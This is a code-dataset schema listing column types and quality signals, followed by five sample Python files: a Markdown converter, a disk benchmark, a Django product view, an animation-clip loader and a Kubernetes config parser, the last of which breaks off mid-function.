**Schema** (113 columns):

| column | dtype |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
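A minimal sketch of how a shard with this schema might be loaded and filtered, assuming it is available locally as Parquet and that pandas is acceptable; the filename `shard.parquet`, the 0.2 cutoff, and the reading of `qsc_codepython_cate_ast_quality_signal == 1` as "parsed successfully" are illustrative assumptions, not part of the dataset card:

```python
import pandas as pd

# Hypothetical local shard with the schema above.
df = pd.read_parquet("shard.parquet")

# Keep rows whose Python AST signal is 1 (every row shown below has
# qsc_codepython_cate_ast_quality_signal == 1) and whose content is not
# dominated by duplicated 10-grams; the 0.2 threshold is arbitrary.
mask = (df["qsc_codepython_cate_ast_quality_signal"] == 1) & (
    df["qsc_code_frac_chars_dupe_10grams_quality_signal"] < 0.2
)

for _, row in df.loc[mask].iterrows():
    print(row["max_stars_repo_name"], row["max_stars_repo_path"], row["size"])
```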
**Row 1 — `convertgf.py` from `Wivik/gundam-france`** (hexsha `ddaaf774a1abba687897e41a33028b028a3ed7fd`, size 2,200, ext `py`, lang Python)

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `convertgf.py` | `Wivik/gundam-france` | `65d84098eec431e7e27b6a6c0f1e6eadea1c2bc8` | ["MIT"] | null | null | null |
| max_issues | `convertgf.py` | `Wivik/gundam-france` | `65d84098eec431e7e27b6a6c0f1e6eadea1c2bc8` | ["MIT"] | null | null | null |
| max_forks | `convertgf.py` | `Wivik/gundam-france` | `65d84098eec431e7e27b6a6c0f1e6eadea1c2bc8` | ["MIT"] | null | null | null |

`content`:
```python
#!/usr/bin/env python3
from markdownify import markdownify as md
import argparse
import re
import os
import sys

parser = argparse.ArgumentParser()
parser.add_argument('input_file', help='file to convert')
args = parser.parse_args()
input_file = args.input_file
print(input_file)

if not re.search('.dist.php', input_file):
    test_file = re.sub('\.php', '.dist.php', input_file)
    print(test_file)
    try:
        os.stat(test_file)
        print('file dist exists, ignoring')
        sys.exit(0)
    except:
        os.rename(input_file, test_file)
        print('file renamed, rerun job')
        sys.exit(0)

output_file = os.path.splitext(input_file)[0]
output_file = os.path.splitext(output_file)[0]
output_file = output_file + '.md'
print(output_file)
# sys.exit(0)

with open(input_file, 'r') as file:
    content = file.read()
    html = md(content)
    firstline = html.split('\n', 1)[0]
    if re.search('php include', firstline):
        print('ignore file')
        # os.remove(input_file)
        sys.exit(0)
    # print(firstline)
    ## fix images path
    html = html.replace('](images/', '](/images/')
    # html = re.sub("{lien:db:(\d+):", "", html)
    # html = re.sub("(html:lien})", "", html)
    html = re.sub("(\s)({lien:db:)(\d+):(.*):(.*)(\.html:lien})(\s)", " \\4 ", html)
    html = re.sub("(’)({lien:db:)(\d+):(.*):(.*)(\.html:lien})(,)", "'\\4 ", html)
    html = re.sub("(\s)({lien:db:)(\d+):(.*):(.*)(\.html:lien})(,)", " \\4,", html)
    # html = re.sub("(\ )({lien:db:)(\d+):(.*):(.*)(\.html:lien})(,)", " \\4,", html)
    # html = re.sub("(\ )({lien:db:)(\d+):(.*):(.*)(\.html:lien})(\s)", " \\4,", html)
    # html = re.sub("(\ )({lien:db:)(\d+):(.*):(.*)(\.html:lien})(\.)", " \\4.", html)
    html = re.sub("(\s)({lien:db:)(\d+):(.*):(.*)(\.html:lien})(\.)", " \\4.", html)
    html = re.sub("(<\?php echo \$_SERVER\[\'REQUEST_URI\'\]; \?>)", "", html)
    html = re.sub("(php include\(\"modules/flag\\_spoiler\.php\"\); \?)", "", html)
    # print(html)
    result = '---\ntitle: "'+ firstline + '"\n---\n\n' + html
    # print(output)
    with (open(output_file, 'w')) as output:
        output.write(result)
        output.close()
    file.close()
```
**Quality signals** (in schema order, `avg_line_length` through `qsc_codepython_frac_lines_print_quality_signal`): 32.352941 | 86 | 0.537727 | 294 | 2,200 | 3.935374 | 0.268707 | 0.051858 | 0.085566 | 0.11236 | 0.267934 | 0.251513 | 0.208297 | 0.191011 | 0.191011 | 0.191011 | 0 | 0.008924 | 0.185 | 2,200 | 67 | 87 | 32.835821 | 0.636364 | 0.199545 | 0 | 0.068182 | 0 | 0 | 0.255441 | 0.124857 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.113636 | 0 | 0.113636 | 0.136364. The unsuffixed `qsc_code_*`/`qsc_codepython_*` counterparts are all 0 (null for `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`); `effective` = 1, `hits` = 0.
**Row 2 — `scripts/disktest.py` from `CloudAdvocacy/ObjectDetection`** (hexsha `ddab10387c063d1c5dd03502020dc60340b9c9c1`, size 1,957, ext `py`, lang Python)

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `scripts/disktest.py` | `CloudAdvocacy/ObjectDetection` | `ba823455a43684dea8f0bc1eab6f669a818895bb` | ["MIT"] | null | null | null |
| max_issues | `scripts/disktest.py` | `CloudAdvocacy/ObjectDetection` | `ba823455a43684dea8f0bc1eab6f669a818895bb` | ["MIT"] | null | null | null |
| max_forks | `scripts/disktest.py` | `CloudAdvocacy/ObjectDetection` | `ba823455a43684dea8f0bc1eab6f669a818895bb` | ["MIT"] | null | null | null |

`content`:
```python
import io, os
import argparse
from timeit import default_timer as timer

parser = argparse.ArgumentParser(description="File Performance Testing Util")
parser.add_argument("command",help="Test to perform",choices=['read','write','readany'])
parser.add_argument("dir",help="Directory to use")
args = parser.parse_args()

def time(msg,size,f):
    print(msg,end='...')
    st = timer()
    f()
    el = timer()-st
    print("{} sec, {} Mb/sec".format(el,size/el/1024/1024))

def write_test(n,size):
    fn = "test_{}".format(size)+"_{}"
    buf = os.urandom(size)
    for i in range(n):
        with open(os.path.join(args.dir,fn.format(i)),'wb') as f:
            f.write(buf)

def read_test(n,size):
    fn = "test_{}".format(size)+"_{}"
    for i in range(n):
        with open(os.path.join(args.dir,fn.format(i)),'rb') as f:
            buf = bytearray(f.read())

# In the original this function was also named `read_test`, which shadowed the
# two-argument version above and broke the "read" command; renamed here so
# both code paths work.
def read_any_test(n=1000):
    sz = 0
    i = 0
    st = timer()
    for x in os.listdir(args.dir):
        with open(os.path.join(args.dir,x),'rb') as f:
            buf = bytearray(f.read())
        sz += len(buf)
        i += 1
        n -= 1
        if n == 0:
            break
    en = timer()-st
    print("{} secs, {} Mb/Sec, av file size: {} Mb".format(en,sz/1024/1024/en,sz/i/1024/1024))

if args.command == "read":
    time("1000 1k files",1024*1000,lambda: read_test(1000,1024))
    time("100 1M files",1024*1024*100,lambda: read_test(100,1024*1024))
    time("10 10M files",10*1024*1024*10,lambda: read_test(10,1024*1024*10))
    time("1 100M files",1*1024*1024*100,lambda: read_test(1,1024*1024*100))
elif args.command == "write":
    time("1000 1k files",1024*1000,lambda: write_test(1000,1024))
    time("100 1M files",1024*1024*100,lambda: write_test(100,1024*1024))
    time("10 10M files",10*1024*1024*10,lambda: write_test(10,1024*1024*10))
    time("1 100M files",1*1024*1024*100,lambda: write_test(1,1024*1024*100))
elif args.command == "readany":
    read_any_test()
```
**Quality signals** (in schema order, `avg_line_length` through `qsc_codepython_frac_lines_print_quality_signal`): 33.169492 | 94 | 0.616249 | 320 | 1,957 | 3.70625 | 0.253125 | 0.10118 | 0.055649 | 0.057336 | 0.530354 | 0.530354 | 0.515177 | 0.369309 | 0.317032 | 0.317032 | 0 | 0.152132 | 0.197241 | 1,957 | 59 | 95 | 33.169492 | 0.602801 | 0 | 0 | 0.16 | 0 | 0 | 0.145557 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08 | false | 0 | 0.06 | 0 | 0.14 | 0.06. The unsuffixed `qsc_code_*`/`qsc_codepython_*` counterparts are all 0 (null for `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`); `effective` = 1, `hits` = 0.
**Row 3 — `products/views.py` from `deepindo/DoPython`** (hexsha `ddaf61fd3b67b0ad82d3ff5a5a750292ac61bd57`, size 2,728, ext `py`, lang Python)

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `products/views.py` | `deepindo/DoPython` | `d80b85b3b24566de6ece9f452564e4827e705959` | ["MIT"] | 4 | 2022-01-04T09:56:19.000Z | 2022-01-20T12:14:16.000Z |
| max_issues | `products/views.py` | `deepindo/DoPython` | `d80b85b3b24566de6ece9f452564e4827e705959` | ["MIT"] | null | null | null |
| max_forks | `products/views.py` | `deepindo/DoPython` | `d80b85b3b24566de6ece9f452564e4827e705959` | ["MIT"] | 1 | 2022-01-20T09:40:16.000Z | 2022-01-20T09:40:16.000Z |

`content` (comments translated from Chinese):
```python
from django.shortcuts import render, get_object_or_404
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from products.models import Product

def productList(request, productName):
    """Product list page."""
    submenu = productName
    if productName == 'robot':
        productName = '家用机器人'
    elif productName == 'monitor':
        productName = '智能门锁'
    else:
        productName = '人脸识别解决方案'
    product_list = Product.objects.filter(product_type=productName).order_by('-publish_date')
    # Pagination: show 2 items per page
    p = Paginator(product_list, 2)
    if p.num_pages <= 1:
        page_data = ''
    else:
        # Get the current page, defaulting to 1
        page = int(request.GET.get('page', 1))
        # Fetch that page of results
        product_list = p.page(page)
        left = []
        right = []
        left_has_more = False
        right_has_more = False
        first = False
        last = False
        total_pages = p.num_pages  # total number of pages
        page_range = p.page_range  # iterable of page numbers
        if page == 1:
            right = page_range[page:page + 2]
            print(total_pages)
            if right[-1] < total_pages - 1:
                right_has_more = True
            if right[-1] < total_pages:
                last = True
        elif page == total_pages:
            left = page_range[(page - 3) if (page - 3) > 0 else 0:page - 1]
            if left[0] > 2:
                left_has_more = True
            if left[0] > 1:
                first = True
        else:
            left = page_range[(page - 3) if (page - 3) > 0 else 0:page - 1]
            right = page_range[page:page + 2]
            if left[0] > 2:
                left_has_more = True
            if left[0] > 1:
                first = True
            if right[-1] < total_pages - 1:
                right_has_more = True
            if right[-1] < total_pages:
                last = True
        page_data = {
            'left': left,
            'right': right,
            'left_has_more': left_has_more,
            'right_has_more': right_has_more,
            'first': first,
            'last': last,
            'total_pages': total_pages,
            'page': page,
        }
    context = {
        'active_menu': 'products',
        'sub_menu': submenu,
        'productName': productName,
        'productList': product_list,
        'pageData': page_data
    }
    return render(request, 'products/productList.html', context)

def productDetail(request, id):
    """Product detail page."""
    product = get_object_or_404(Product, id=id)  # look up by id; 404 if not found
    product.product_views += 1  # increment the view count
    product.save()
    return render(request, 'products/productDetail.html', {
        'active_menu': 'products',
        'product': product,
    })
```
**Quality signals** (in schema order, `avg_line_length` through `qsc_codepython_frac_lines_print_quality_signal`): 29.978022 | 93 | 0.535924 | 304 | 2,728 | 4.621711 | 0.266447 | 0.049822 | 0.039146 | 0.037011 | 0.253381 | 0.231317 | 0.231317 | 0.231317 | 0.195018 | 0.195018 | 0 | 0.024446 | 0.355205 | 2,728 | 91 | 94 | 29.978022 | 0.774304 | 0.028959 | 0 | 0.328947 | 0 | 0 | 0.091565 | 0.019757 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026316 | false | 0 | 0.039474 | 0 | 0.092105 | 0.013158. The unsuffixed `qsc_code_*`/`qsc_codepython_*` counterparts are all 0 (null for `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`); `effective` = 1, `hits` = 0.
**Row 4 — `misc/CharacterMotion.py` from `qwewqa/dl-datamine`** (hexsha `ddb0240924a8101cddcbf80261a52d4f5843c4bf`, size 1,545, ext `py`, lang Python)

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `misc/CharacterMotion.py` | `qwewqa/dl-datamine` | `a8e050731f67e4cf49123947eadf66ac0fd948ca` | ["MIT"] | 2 | 2020-03-31T00:07:54.000Z | 2020-04-01T23:39:23.000Z |
| max_issues | `misc/CharacterMotion.py` | `qwewqa/dl-datamine` | `a8e050731f67e4cf49123947eadf66ac0fd948ca` | ["MIT"] | null | null | null |
| max_forks | `misc/CharacterMotion.py` | `qwewqa/dl-datamine` | `a8e050731f67e4cf49123947eadf66ac0fd948ca` | ["MIT"] | 1 | 2021-08-02T04:21:31.000Z | 2021-08-02T04:21:31.000Z |

`content`:
```python
import json
import os
from dataclasses import dataclass, field
from typing import Dict, Optional

@dataclass
class AnimationClipData:
    name: str
    startTime: float
    stopTime: float
    id: Optional[int] = field(init=False)
    duration: float = field(init=False)

    def __post_init__(self):
        self.duration = self.stopTime - self.startTime
        try:
            self.id = int(self.name.split('_')[-1])
        except (IndexError, ValueError):
            self.id = None

def load_animation_clip_data(in_path: str) -> Optional[AnimationClipData]:
    with open(in_path) as f:
        data = json.load(f)
        return AnimationClipData(
            name=data['name'],
            startTime=data['m_MuscleClip']['m_StartTime'],
            stopTime=data['m_MuscleClip']['m_StopTime']
        )

def get_animation_clip_data(in_dir: str) -> Dict[str, AnimationClipData]:
    clips = {}
    for root, _, files in os.walk(in_dir):
        for file_name in files:
            file_path = os.path.join(root, file_name)
            try:
                clip = load_animation_clip_data(file_path)
                clips[clip.name] = clip
            except (KeyError, TypeError):
                pass
    return clips

def get_animation_clip_data_by_id(in_dir: str) -> Dict[Optional[int], Dict[str, AnimationClipData]]:
    clips = {}
    data = get_animation_clip_data(in_dir)
    for clip in data.values():
        if clip.id not in clips:
            clips[clip.id] = {}
        clips[clip.id][clip.name] = clip
    return clips
```
**Quality signals** (in schema order, `avg_line_length` through `qsc_codepython_frac_lines_print_quality_signal`): 28.611111 | 100 | 0.618123 | 192 | 1,545 | 4.776042 | 0.317708 | 0.070883 | 0.092694 | 0.062159 | 0.082879 | 0.054526 | 0 | 0 | 0 | 0 | 0 | 0.000893 | 0.275081 | 1,545 | 53 | 101 | 29.150943 | 0.817857 | 0 | 0 | 0.136364 | 0 | 0 | 0.032362 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0.022727 | 0.090909 | 0 | 0.386364 | 0. The unsuffixed `qsc_code_*`/`qsc_codepython_*` counterparts are all 0 (null for `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`); `effective` = 1, `hits` = 0.
**Row 5 — `kube/config.py` from `nearmap/kubefs`** (hexsha `ddb050b82209d0997ed09ca448c8c2752e16f7c5`, size 14,431, ext `py`, lang Python)

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `kube/config.py` | `nearmap/kubefs` | `e2f6c019f04e436d031874e40c59ba0ee61d8c58` | ["MIT"] | 3 | 2021-05-31T06:45:37.000Z | 2021-10-05T22:36:37.000Z |
| max_issues | `kube/config.py` | `nearmap/kubefs` | `e2f6c019f04e436d031874e40c59ba0ee61d8c58` | ["MIT"] | 8 | 2021-09-06T00:43:13.000Z | 2021-10-01T00:22:53.000Z |
| max_forks | `kube/config.py` | `nearmap/kubefs` | `e2f6c019f04e436d031874e40c59ba0ee61d8c58` | ["MIT"] | null | null | null |

`content`:
```python
import base64
import fnmatch
import logging
import os
import tempfile
from ssl import SSLContext, create_default_context
from typing import Dict, List, Optional, Sequence

import yaml

from kube.tools.repr import disp_secret_blob, disp_secret_string


class ExecCmd:
    def __init__(self, *, command: str, args: List[str], env: Dict[str, str]) -> None:
        self.command = command
        self.args = args
        self.env = env

    def __repr__(self) -> str:
        return "<%s command=%r, args=%r, env=%r>" % (
            self.__class__.__name__,
            self.command,
            self.args,
            self.env,
        )


class User:
    def __init__(
        self,
        *,
        name: str,
        username: Optional[str],
        password: Optional[str],
        client_cert_path: Optional[str],
        client_key_path: Optional[str],
        client_cert_data: Optional[str],
        client_key_data: Optional[str],
        exec: Optional[ExecCmd],
    ) -> None:
        self.name = name
        self.username = username
        self.password = password
        self.client_cert_path = client_cert_path
        self.client_key_path = client_key_path
        self.client_cert_data = client_cert_data
        self.client_key_data = client_key_data
        self.exec = exec
        # host.company.com -> host
        self.short_name = name.split(".")[0]

    def __repr__(self) -> str:
        return (
            "<%s name=%r, username=%r, password=%s, "
            "client_cert_path=%r, client_key_path=%r, "
            "client_cert_data=%s, client_key_data=%s, "
            "exec=%r>"
        ) % (
            self.__class__.__name__,
            self.name,
            self.username,
            disp_secret_string(self.password),
            self.client_cert_path,
            self.client_key_path,
            disp_secret_blob(self.client_cert_data),
            disp_secret_blob(self.client_key_data),
            self.exec,
        )

    def get_attribute_names(self) -> List[str]:
        "Returns names of all attributes that are set"
        names = []
        attnames = dir(self)
        for attname in attnames:
            value = getattr(self, attname)
            if attname.startswith("_") or callable(value):
                continue
            if not value:
                continue
            names.append(attname)
        return names


class Cluster:
    def __init__(
        self,
        *,
        name: str,
        server: str,
        ca_cert_path: Optional[str],
        ca_cert_data: Optional[str],
    ) -> None:
        self.name = name
        self.server = server
        self.ca_cert_path = ca_cert_path
        self.ca_cert_data = ca_cert_data
        # host.company.com -> host
        self.short_name = name.split(".")[0]

    def __repr__(self) -> str:
        return "<%s name=%r, server=%r, ca_cert_path=%r, ca_cert_data=%r>" % (
            self.__class__.__name__,
            self.name,
            self.server,
            self.ca_cert_path,
            disp_secret_blob(self.ca_cert_data),
        )


class Context:
    def __init__(
        self,
        *,
        name: str,
        user: User,
        cluster: Cluster,
        namespace: Optional[str],
    ) -> None:
        self.name = name
        self.user = user
        self.cluster = cluster
        self.namespace = namespace
        self.file: "KubeConfigFile" = None  # type: ignore
        # host.company.com -> host
        self.short_name = name.split(".")[0]

    def __repr__(self) -> str:
        return "<%s name=%r, short_name=%r, user=%r, cluster=%r, namespace=%r>" % (
            self.__class__.__name__,
            self.name,
            self.short_name,
            self.user,
            self.cluster,
            self.namespace,
        )

    def set_file(self, file: "KubeConfigFile") -> None:
        self.file = file

    def create_ssl_context(self) -> SSLContext:
        kwargs = {}
        if self.cluster.ca_cert_path:
            kwargs["cafile"] = self.cluster.ca_cert_path
        elif self.cluster.ca_cert_data:
            value = base64.b64decode(self.cluster.ca_cert_data)
            cert_data = value.decode()
            kwargs["cadata"] = cert_data

        ssl_context = create_default_context(**kwargs)

        # If the cert and key are in the form of blobs then we need to create
        # temporary files for them because the ssl lib only accepts file paths.
        # We first create a tempdir which is rwx only for the current user, so
        # no other users can even list its contents. We then create the two temp
        # files inside it. The tempdir and its contents get removed when the
        # context manager exits.
        if self.user.client_cert_data and self.user.client_key_data:
            with tempfile.TemporaryDirectory(prefix="kube-client.") as tempdir_name:
                cert_content = base64.b64decode(self.user.client_cert_data)
                cert_file_fd, cert_file_name = tempfile.mkstemp(dir=tempdir_name)
                os.write(cert_file_fd, cert_content)

                cert_content = base64.b64decode(self.user.client_key_data)
                key_file_fd, key_file_name = tempfile.mkstemp(dir=tempdir_name)
                os.write(key_file_fd, cert_content)

                ssl_context.load_cert_chain(
                    certfile=cert_file_name,
                    keyfile=key_file_name,
                )
        elif self.user.client_cert_path and self.user.client_key_path:
            ssl_context.load_cert_chain(
                certfile=self.user.client_cert_path,
                keyfile=self.user.client_key_path,
            )
        return ssl_context


class KubeConfigFile:
    def __init__(
        self,
        *,
        filepath: str,
        contexts: Sequence[Context],
        users: Sequence[User],
        clusters: Sequence[Cluster],
        ctime: float,
        mtime: float,
        atime: float,
    ) -> None:
        self.filepath = filepath
        self.contexts = contexts or []
        self.users = users or []
        self.clusters = clusters or []
        self.ctime = ctime
        self.mtime = mtime
        self.atime = atime

    def __repr__(self) -> str:
        return "<%s filepath=%r, contexts=%r, users=%r, clusters=%r>" % (
            self.__class__.__name__,
            self.filepath,
            self.contexts,
            self.users,
            self.clusters,
        )


class KubeConfigCollection:
    def __init__(self) -> None:
        self.clusters: Dict[str, Cluster] = {}
        self.contexts: Dict[str, Context] = {}
        self.users: Dict[str, User] = {}

    def add_file(self, config_file: KubeConfigFile) -> None:
        # NOTE: does not enforce uniqueness of context/user/cluster names
        for cluster in config_file.clusters:
            self.clusters[cluster.name] = cluster
        for context in config_file.contexts:
            self.contexts[context.name] = context
        for user in config_file.users:
            self.users[user.name] = user

    def get_context_names(self) -> Sequence[str]:
        names = list(self.contexts.keys())
        names.sort()
        return names

    def get_context(self, name) -> Optional[Context]:
        return self.contexts.get(name)


class KubeConfigSelector:
    def __init__(self, *, collection: KubeConfigCollection) -> None:
        self.collection = collection

    def fnmatch_context(self, pattern: str) -> List[Context]:
        names = self.collection.get_context_names()
        names = fnmatch.filter(names, pattern)
        objs = [self.collection.get_context(name) for name in names]
        contexts = [ctx for ctx in objs if ctx]
        return contexts


class KubeConfigLoader:
    def __init__(
        self, *, config_dir="$HOME/.kube", config_var="KUBECONFIG", logger=None
    ) -> None:
        self.config_dir = config_dir
        self.config_var = config_var
        self.logger = logger or logging.getLogger("config-loader")

    def get_candidate_files(self) -> Sequence[str]:
        # use config_var if set
        env_var = os.getenv(self.config_var)
        if env_var:
            filepaths = env_var.split(":")
            filepaths = [fp.strip() for fp in filepaths if fp.strip()]
            return filepaths

        # fall back on config_dir
        path = os.path.expandvars(self.config_dir)
        filenames = os.listdir(path)
        filepaths = []
        for fn in filenames:
            fp = os.path.join(path, fn)
            if not os.path.isfile(fp):
                continue
            filepaths.append(fp)
        return filepaths

    def take_after_last_slash(self, name: str) -> str:
        # arn:aws:iam::123:role/myrole -> myrole
        if "/" in name:
            name = name.rsplit("/")[1]
        return name

    def parse_context(
        self, clusters: Sequence[Cluster], users: Sequence[User], dct
    ) -> Optional[Context]:
        name = dct.get("name")
        name = self.take_after_last_slash(name)
        obj = dct.get("context")
        cluster_id = obj.get("cluster")
        namespace = obj.get("namespace")
        user_id = obj.get("user")
        cluster_id = self.take_after_last_slash(cluster_id)
        user_id = self.take_after_last_slash(user_id)

        # 'name', 'cluster' and 'user' are required attributes
        if all((name, cluster_id, user_id)):
            users = [user for user in users if user.name == user_id]
            if not users:
                self.logger.warn(
                    "When parsing context %r could not find matching user %r",
                    name,
                    user_id,
                )
            clusters = [cluster for cluster in clusters if cluster.name == cluster_id]
            if not clusters:
                self.logger.warn(
                    "When parsing context %r could not find matching cluster %r",
                    name,
                    cluster_id,
                )
            if users and clusters:
                return Context(
                    name=name,
                    user=users[0],
                    cluster=clusters[0],
                    namespace=namespace,
                )
        return None

    def parse_cluster(self, dct) -> Optional[Cluster]:
        name = dct.get("name")
        name = self.take_after_last_slash(name)
        obj = dct.get("cluster")
        server = obj.get("server")
        ca_cert_path = obj.get("certificate-authority")
        ca_cert_data = obj.get("certificate-authority-data")

        # 'name' and 'server' are required attributes
        if name and server:
            return Cluster(
                name=name,
                server=server,
                ca_cert_path=ca_cert_path,
                ca_cert_data=ca_cert_data,
            )
        return None

    def parse_user(self, dct) -> Optional[User]:
        name = dct.get("name")
        name = self.take_after_last_slash(name)
        obj = dct.get("user")
        password = obj.get("password")
        username = obj.get("username")
        client_cert_path = obj.get("client-certificate")
        client_key_path = obj.get("client-key")
        client_cert_data = obj.get("client-certificate-data")
        client_key_data = obj.get("client-key-data")
        exec_obj = obj.get("exec")

        # 'name' is the only required attribute
        if name:
            exec = None
            if exec_obj:
                command = exec_obj.get("command")
                args = exec_obj.get("args") or []
                env_map = exec_obj.get("env") or {}
                env = {}
                for item_dct in env_map:
                    key = item_dct.get("name")
                    value = item_dct.get("value")
                    if key and value:
                        env[key] = value
                exec = ExecCmd(command=command, args=args, env=env)
            return User(
                name=name,
                username=username,
                password=password,
                client_cert_path=client_cert_path,
                client_key_path=client_key_path,
                client_cert_data=client_cert_data,
                client_key_data=client_key_data,
                exec=exec,
            )
        return None

    def load_file(self, filepath: str) -> Optional[KubeConfigFile]:
        with open(filepath, "rb") as fl:
            try:
                dct = yaml.load(fl, Loader=yaml.SafeLoader)
            except Exception:
                self.logger.warn("Failed to parse kube config as yaml: %s", filepath)
                return None

        kind = dct.get("kind")
        if not kind == "Config":
            self.logger.warn("Kube config does not have kind: Config: %s", filepath)
            return None

        clust_list = [self.parse_cluster(clus) for clus in dct.get("clusters") or []]
        clusters = [cluster for cluster in clust_list if cluster]
        user_list = [self.parse_user(user) for user in dct.get("users") or []]
        users = [user for user in user_list if user]
        ctx_list = [
            self.parse_context(clusters, users, ctx)
            for ctx in dct.get("contexts") or []
        ]
        contexts = [ctx for ctx in ctx_list if ctx]

        st = os.stat(filepath)

        # The context is the organizing principle of a kube config so if we
        # didn't find any we failed to parse the file
        if contexts:
            config_file = KubeConfigFile(
                filepath=filepath,
                contexts=contexts,
                users=users,
                clusters=clusters,
                ctime=st.st_ctime,
                mtime=st.st_mtime,
                atime=st.st_atime,
            )
            for context in contexts:
                context.set_file(config_file)
            return config_file
        return None

    def create_collection(self) -> KubeConfigCollection:
        collection = KubeConfigCollection()
        for filepath in self.get_candidate_files():
